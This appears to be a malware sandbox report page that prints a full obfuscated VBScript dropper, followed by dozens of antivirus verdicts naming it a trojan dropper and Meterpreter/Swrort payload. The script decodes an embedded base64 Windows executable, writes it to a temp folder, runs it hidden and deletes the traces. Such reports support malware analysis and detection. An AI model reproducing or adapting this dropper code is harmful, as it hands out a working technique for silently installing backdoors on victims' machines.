popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
Function gKvxcceSsnFW(XEWfxpZMVzDW)
WhaZXEtqwiYpk = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
XEWfxpZMVzDW & "</B64DECODE>"
Set hRRRTVSjwloT = CreateObject("MSXML2.DOMDocument.3.0")
hRRRTVSjwloT.LoadXML(WhaZXEtqwiYpk)
gKvxcceSsnFW = hRRRTVSjwloT.selectsinglenode("B64DECODE").nodeTypedValue
set hRRRTVSjwloT = nothing
End Function
Function ukgOmdyxrq()
wEvGkBpSc = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDACLzWuYAAAAAAAAAAOAADwMLAQI4AAIAAAAOAAAAAAAAABAAAAAQAAAAIAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAABAAAAAAgAARjoAAAIAAAAAACAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAAAwAABkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAKAAAAAAQAAAAAgAAAAIAAAAAAAAAAAAAAAAAACAAMGAuZGF0YQAAAJAKAAAAIAAAAAwAAAAEAAAAAAAAAAAAAAAAAAAgADDgLmlkYXRhAABkAAAAADAAAAACAAAAEAAAAAAAAAAAAAAAAAAAQAAwwAAAAAAAAAAAAAAAAAAAAAC4ACBAAP/gkP8lODBAAJCQAAAAAAAAAAD/////AAAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Dim kADVsPhG
Set kADVsPhG = CreateObject("Scripting.FileSystemObject")
Dim gjqSoYBDOGFtYRF
Dim HRjjhCOWQ
Set gjqSoYBDOGFtYRF = kADVsPhG.GetSpecialFolder(2)
HRjjhCOWQ = gjqSoYBDOGFtYRF & "\" & kADVsPhG.GetTempName()
kADVsPhG.CreateFolder(HRjjhCOWQ)
rafmWhgMpMkAOC = HRjjhCOWQ & "\" & "ldGggdLlciUOIRz.exe"
Dim pZBvlvqvbsO
Set pZBvlvqvbsO = CreateObject("Wscript.Shell")
ixoYFuuugPBWh = gKvxcceSsnFW(wEvGkBpSc)
Set SlpMZAdSe = CreateObject("ADODB.Stream")
SlpMZAdSe.Type = 1
SlpMZAdSe.Open
SlpMZAdSe.Write ixoYFuuugPBWh
SlpMZAdSe.SaveToFile rafmWhgMpMkAOC, 2
pZBvlvqvbsO.run rafmWhgMpMkAOC, 0, true
kADVsPhG.DeleteFile(rafmWhgMpMkAOC)
kADVsPhG.DeleteFolder(HRjjhCOWQ)
End Function
ukgOmdyxrq
Antivirus Signature
Bkav Clean
Lionic Trojan.Win32.Generic.4!c
ClamAV Vbs.Backdoor.Msfvenom_Payload-9955777-0
CMC Clean
CAT-QuickHeal Trojan.VBS.33100
ALYac VB:Trojan.VBS.Dropper.AG
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Generic-VBS.Save.5e608eb4
K7AntiVirus Clean
K7GW Clean
Baidu JS.Trojan-Downloader.Agent.xk
VirIT Clean
Cyren VBS/Agent.AJU!Eldorado
Symantec VBS.Heur.SNIC
ESET-NOD32 Win32/Rozena.ED
TrendMicro-HouseCall Clean
Avast BV:Dowloader-A [Trj]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender VB:Trojan.VBS.Dropper.AG
NANO-Antivirus Trojan.Script.Agent.fosjzx
ViRobot Clean
MicroWorld-eScan VB:Trojan.VBS.Dropper.AG
Tencent Heur:Trojan.Script.LS_Gencirc.7061677.0
Sophos Troj/Swrort-AL
F-Secure Malware.HTML/ExpKit.Gen2
DrWeb JS.Muldrop.457
VIPRE VB:Trojan.VBS.Dropper.AG
TrendMicro HEUR_VBS.O1
McAfee-GW-Edition VBS/MPreter
FireEye VB:Trojan.VBS.Dropper.AG
Emsisoft VB:Trojan.VBS.Dropper.AG (B)
GData VB:Trojan.VBS.Dropper.AG
Jiangmin Clean
Avira HTML/ExpKit.Gen2
MAX malware (ai score=82)
Antiy-AVL Clean
Gridinsoft Trojan.U.Gen.bot
Xcitium TrojWare.VBS.TrojanDropper.Agent.NJA@833icd
Arcabit VB:Trojan.VBS.Dropper.AG
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Win32.Generic
Microsoft TrojanDropper:VBS/Ploty.A
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee VBS/MPreter
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Dropper.Ploty!8.EEC8 (TOPIS:E0:JqyfiJ1QMlQ)
Yandex Clean
Ikarus Trojan.Win32.Swrort
MaxSecure Clean
Fortinet VBS/Rozena.ED!tr
BitDefenderTheta Clean
AVG BV:Dowloader-A [Trj]
Panda Clean
No IRMA results available.